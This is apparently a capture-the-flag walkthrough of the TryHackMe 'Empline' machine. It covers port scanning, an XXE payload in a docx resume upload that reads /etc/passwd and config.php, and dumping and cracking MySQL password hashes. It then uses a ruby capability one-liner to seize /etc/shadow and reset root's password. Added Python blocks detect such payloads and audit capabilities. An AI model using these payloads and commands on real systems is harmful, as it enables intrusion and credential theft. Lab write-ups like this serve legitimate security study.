Recon
Portscanning
command:sudo nmap -A 10.10.106.137 -T4 -v -p-
# Nmap 7.93 scan initiated Fri May 12 10:05:36 2023 as: nmap -A -T4 -v -p- -oN empline 10.10.106.137
Increasing send delay for 10.10.106.137 from 0 to 5 due to 1308 out of 3269 dropped probes since last increase.
Increasing send delay for 10.10.106.137 from 5 to 10 due to 21 out of 52 dropped probes since last increase.
Nmap scan report for 10.10.106.137
Host is up (0.16s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c0d541eea4d0830c970d75cc7b107f76 (RSA)
| 256 8382f969197d0d5c5365d554f645db74 (ECDSA)
|_ 256 4f913e8b696909700e8226285c8471c9 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Empline
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.29 (Ubuntu)
3306/tcp open mysql MySQL 5.5.5-10.1.48-MariaDB-0ubuntu0.18.04.1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.1.48-MariaDB-0ubuntu0.18.04.1
| Thread ID: 86
| Capabilities flags: 63487
| Some Capabilities: ODBCClient, ConnectWithDatabase, SupportsCompression, Support41Auth, IgnoreSigpipes, Speaks41ProtocolOld, SupportsTransactions, InteractiveClient, IgnoreSpaceBeforeParenthesis, LongPassword, FoundRows, Speaks41ProtocolNew, LongColumnFlag, SupportsLoadDataLocal, DontAllowDatabaseTableColumn, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: 5;i!dU\NT:ceP@2x)_'@
|_ Auth Plugin Name: mysql_native_password
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
Uptime guess: 41.098 days (since Sat Apr 1 08:01:26 2023)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 554/tcp)
HOP RTT ADDRESS
1 164.08 ms 10.18.0.1
2 173.72 ms 10.10.106.137
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri May 12 10:22:16 2023 -- 1 IP address (1 host up) scanned in 999.52 seconds
From our scan we have 3 open ports: port 22, which runs ssh; port 80, which runs http; and port 3306, which runs mysql. We’ll be starting our enumeration today from port 80.
Enumeration (Port 80)
Going to the webpage, you get this
Let's try to fuzz for directories using ffuf
command:ffuf -u "http://10.10.106.137/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt -e .zip,.sql,.php,.phtml,.bak,.backup
┌──(bl4ck4non㉿bl4ck4non)-[~]
└─$ ffuf -u "http://10.10.106.137/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt -e .zip,.sql,.php,.phtml,.bak,.backup
v1.5.0 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://10.10.106.137/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt
:: Extensions : .zip .sql .php .phtml .bak .backup
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
assets [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 231ms]
javascript [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 394ms]
server-status [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 175ms]
:: Progress: [140812/140812] :: Job [1/1] :: 175 req/sec :: Duration: [0:11:55] :: Errors: 0 ::
Oops, there was nothing here actually. Let's move on to viewing the page source.
We found a subdomain, job.empline.thm, in the page source. Let's go ahead and add this to our /etc/hosts file.
Navigating to the subdomain page should get you this
This webpage is running on OpenCATS 0.9.4. Let's try to look for exploits.
So, we can perform a 'docx' XML External Entity Injection (XXE) attack on this. This is the first time I’ll be seeing this though hehe. Since we found the vulnerability, let's go ahead and exploit it😎
Exploitation (Port 80)
If you recall, in the page source we saw this link: http://job.empline.thm/careers. Let's navigate to that link.
Checking around the webpage, I found an upload page.
We are required to upload our resume, and this accepts a docx and an odt file. Well, this is exactly what we want😂.
We are going to make use of this blog to exploit this vulnerability. Let's get started
#!/usr/bin/env python
# Requires the python-docx package (pip install python-docx)
from docx import Document

document = Document()                              # new, empty Word document
paragraph = document.add_paragraph('BlackAnon')    # one paragraph of body text
document.save('resume.docx')                       # written to the current directory
Save this Python script into a file, let's say abeg.py. What this script does is use the “docx” module (python-docx) to create a new Word document, add a paragraph containing the text “BlackAnon”, and save the document as a file named “resume.docx” in the current working directory.
Let's save this and run it
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/TryHackMe/empline]
└─$ nano abeg.py
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/TryHackMe/empline]
└─$ python abeg.py
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/TryHackMe/empline]
└─$ ls
abeg.py empline resume.docx
As you can see, it generated a docx file, resume.docx. Let's upload this resume.
Cool hehe, now this docx file isn’t malicious, because all it does is carry a name.
A docx file is mostly just zipped-up XML files. We need to unzip resume.docx, modify the contents of word/document.xml, then save our changes back into resume.docx.
command:unzip resume.docx
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/TryHackMe/empline]
└─$ unzip resume.docx
Archive: resume.docx
inflating: [Content_Types].xml
inflating: _rels/.rels
inflating: docProps/core.xml
inflating: docProps/app.xml
inflating: word/document.xml
inflating: word/_rels/document.xml.rels
inflating: word/styles.xml
inflating: word/stylesWithEffects.xml
inflating: word/settings.xml
inflating: word/webSettings.xml
inflating: word/fontTable.xml
inflating: word/theme/theme1.xml
inflating: customXml/item1.xml
inflating: customXml/_rels/item1.xml.rels
inflating: customXml/itemProps1.xml
inflating: word/numbering.xml
inflating: docProps/thumbnail.jpeg
We’ll be modifying the word/document.xml file, and we’ll be making two modifications. For the first one, add this payload <!DOCTYPE message [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]> under line one to read the /etc/passwd file.
Now, for the second modification, we need to find BlackAnon, which was the content of the resume, and change it to &xxe;
We are done with the modifications. To save the modifications to the resume.docx file, we have to zip it
command:zip resume.docx word/document.xml
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/TryHackMe/empline]
└─$ zip resume.docx word/document.xml
updating: word/document.xml (deflated 65%)
Let's try to upload this again. All things being equal, we should be able to view the /etc/passwd file.
Nice😎. To read the OpenCATS config.php file and recover plaintext passwords, we will need to base64-encode its contents, since the raw PHP source contains characters that would break the XML it is inlined into.
payload:<!DOCTYPE message [<!ENTITY xxe SYSTEM 'php://filter/convert.base64-encode/resource=config.php'>]>
To save the modifications we have to zip the resume.docx file again
command:zip resume.docx word/document.xml
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/TryHackMe/empline]
└─$ zip resume.docx word/document.xml
updating: word/document.xml (deflated 64%)
Let's try to upload this file again
We got something in base64. Let's try to decode this using CyberChef.
/* Database configuration. */
define('DATABASE_USER', 'james');
define('DATABASE_PASS', 'ng6pUFvsGNtw');
define('DATABASE_HOST', 'localhost');
define('DATABASE_NAME', 'opencats');
So, we got credentials for the mysql database, which runs on port 3306. Let's try to enumerate that port.
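Both payloads above rely on the same property: word/document.xml is plain XML, and the application's parser resolves the entities declared in it. As an added example that is not part of the original writeup, here is a stdlib-only Python check an upload handler could run on a resume before parsing it: it opens the zip, inspects every XML part and flags any DOCTYPE or SYSTEM/PUBLIC entity declaration, which catches both the file:// and the php://filter variants. The sample documents are constructed inline, and the minimal .docx built here holds only the parts the check needs, not a full Word package.

```python
import io
import re
import zipfile

# A .docx is a zip of XML parts. Word never writes a DOCTYPE into
# word/document.xml, so a DTD or an external entity declaration in an
# uploaded resume is a reliable indicator of the XXE payload shown above.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
EXTERNAL_ENTITY_RE = re.compile(rb"<!ENTITY\s+\S+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)
XML_MEMBER_RE = re.compile(r"\.(?:xml|rels)$", re.IGNORECASE)  # parts worth inspecting

def find_xxe_indicators(docx_bytes: bytes) -> list:
    """Return (member, indicator) pairs for every XML part that carries a DTD."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not XML_MEMBER_RE.search(name):
                continue
            data = zf.read(name)
            if DOCTYPE_RE.search(data):
                findings.append((name, "DOCTYPE declaration"))
            if EXTERNAL_ENTITY_RE.search(data):
                findings.append((name, "external entity (SYSTEM/PUBLIC)"))
    return findings

def build_docx(document_xml: bytes) -> bytes:
    """Constructed minimal .docx with only the parts the check needs (test input)."""
    content_types = (b'<?xml version="1.0" encoding="UTF-8"?>'
                     b'<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
                     b'<Default Extension="xml" ContentType="application/xml"/></Types>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("word/document.xml", document_xml)
    return buf.getvalue()

# Constructed samples: the benign resume body (simplified from what python-docx
# writes) and the same part after the two edits described above.
BENIGN_DOCUMENT = (b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
                   b'<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
                   b'<w:body><w:p><w:r><w:t>BlackAnon</w:t></w:r></w:p></w:body></w:document>')
XXE_DOCUMENT = BENIGN_DOCUMENT.replace(
    b"?>", b"?><!DOCTYPE message [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>", 1
).replace(b"BlackAnon", b"&xxe;")

if __name__ == "__main__":
    print("benign resume:", find_xxe_indicators(build_docx(BENIGN_DOCUMENT)))
    print("XXE resume:   ", find_xxe_indicators(build_docx(XXE_DOCUMENT)))
```

The complementary fix on the application side is to parse the parts with DTD and entity resolution disabled (for example lxml's XMLParser(resolve_entities=False), or defusedxml), so a payload this check misses still cannot read files.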
Enumeration (Port 3306)
Since we have credentials for the database, we can go ahead and log in
username:james
password:ng6pUFvsGNtw
command:mysql -h 10.10.106.137 -u james -p
We are logged in. Now, let's go ahead and dump the database
commands:
show databases;
use opencats
show tables;
select user_id,user_name,password from user;
Running the last command should show you this
MariaDB [opencats]> select user_id,user_name,password from user;
+---------+----------------+----------------------------------+
| user_id | user_name | password |
+---------+----------------+----------------------------------+
| 1 | admin | b67b5ecc5d8902ba59c65596e4c053ec |
| 1250 | cats@rootadmin | cantlogin |
| 1251 | george | 86d0dfda99dbebc424eb4407947356ac |
| 1252 | james | e53fbdb31890ff3bc129db0e27c473c9 |
+---------+----------------+----------------------------------+
4 rows in set (0.172 sec)
Let's save the passwords and usernames in a file. At this point we’ll be inviting “John The Ripper” to help us out in cracking the passwords hehe.
First, we have to determine the password hash type. The tool we’ll be using for this is hash-identifier. Well, it comes preinstalled with Kali Linux.
command:hash-identifier
Okay, so it is MD5.
Using John,
command:john abeg --wordlist=/home/bl4ck4non/Documents/rockyou.txt --format=RAW-md5
One of the passwords got cracked. Well, all thanks to John😁.
If you recall, from our nmap scan we had the ssh service running. We’ll be trying the creds we found for the ssh server.
username:george
password:pretonnevippasempre
command:ssh george@10.10.106.137
Now that we are logged in, let's go ahead and escalate our privileges.
Privilege Escalation
Checking for linux capabilities
command:getcap -r / 2>/dev/null
Now, this looks sus. Why?? Because the ruby binary with this capability can change the owner of the shadow file, change the root password, and escalate privileges.
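The same getcap sweep is a worthwhile defender-side audit. As an added example, not taken from the original writeup, this Python script parses getcap -r output in both the older "path = caps+ep" and newer "path caps=ep" formats, flags capabilities that amount to root, and singles out interpreters such as ruby, where any local user can drive the capability. The sample listing is constructed, not the box's real output, and the cap_chown entry for ruby is an assumption inferred from the chown one-liner used below.

```python
import re

# Capabilities that let a process bypass or rewrite access control; on an
# interpreter (ruby, python, perl, ...) they are effectively root for any caller.
DANGEROUS_CAPS = {"cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner",
                  "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace",
                  "cap_sys_module", "cap_setfcap"}
INTERPRETER_RE = re.compile(r"/(?:ruby|python|perl|php|node|lua)[0-9.]*$")
# getcap prints "<path> = <caps>+ep" (older libcap) or "<path> <caps>=ep" (newer).
OLD_FORMAT = re.compile(r"^(?P<path>\S+) = (?P<caps>[\w,]+)\+(?P<flags>[eip]+)$")
NEW_FORMAT = re.compile(r"^(?P<path>\S+) (?P<caps>[\w,]+)=(?P<flags>[eip]+)$")

def parse_getcap_line(line: str):
    """Return (path, caps, flags) for a getcap line, or None for anything else."""
    line = line.strip()
    m = OLD_FORMAT.match(line) or NEW_FORMAT.match(line)
    if not m:
        return None
    caps = {c.lower() for c in m.group("caps").split(",")}
    return m.group("path"), caps, m.group("flags")

def audit_getcap(output: str) -> list:
    """Flag files carrying a dangerous capability; returns (path, caps, flags, kind)."""
    findings = []
    for line in output.splitlines():
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, caps, flags = parsed
        risky = sorted(caps & DANGEROUS_CAPS)
        if risky:
            kind = "interpreter" if INTERPRETER_RE.search(path) else "binary"
            findings.append((path, risky, flags, kind))
    return findings

# Constructed sample output (not the box's real getcap listing), mixing both formats.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/ruby = cap_chown+ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/sbin/tcpdump cap_net_admin,cap_net_raw=eip
/usr/local/bin/helper = cap_setuid+p
"""

if __name__ == "__main__":
    for path, caps, flags, kind in audit_getcap(SAMPLE_GETCAP):
        print(f"{path}: {','.join(caps)}+{flags} ({kind})")
```

A permitted-only entry (the +p helper) is still reported, since a program can raise a permitted capability into its effective set itself.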
We’ll be using a one-liner command to change the ownership of the /etc/shadow file to user george.
command:ruby -e 'require "fileutils"; FileUtils.chown(1000, 1000, "/etc/shadow")'
First, let's get the user ID and group ID for user george
command:id
From the above screenshot we can see that the user ID is 1002 and the group ID is 1002. With this we can modify the one-liner command by making use of george’s user ID and group ID.
command:ruby -e 'require "fileutils"; FileUtils.chown(1002, 1002, "/etc/shadow")'
Before running the command
After running the command
What this means is that we now own the /etc/shadow file. What we’ll be doing is changing root’s password. To do this we will generate a new password hash using openssl
command:openssl passwd 1234567890
┌──(bl4ck4non㉿bl4ck4non)-[~]
└─$ openssl passwd 1234567890
$1$BZixveX4$uyaYj/0LEg6nsrY4ikdu41
We’ll be replacing root’s password hash with the newly generated one. You can use any text editor of your choice hehe. I’ll be using nano.
Now that we have successfully changed the root user’s password, we can switch to the root user using the password 1234567890
command:su root
Cool, we are now logged in as the root user😎.
That will be all for today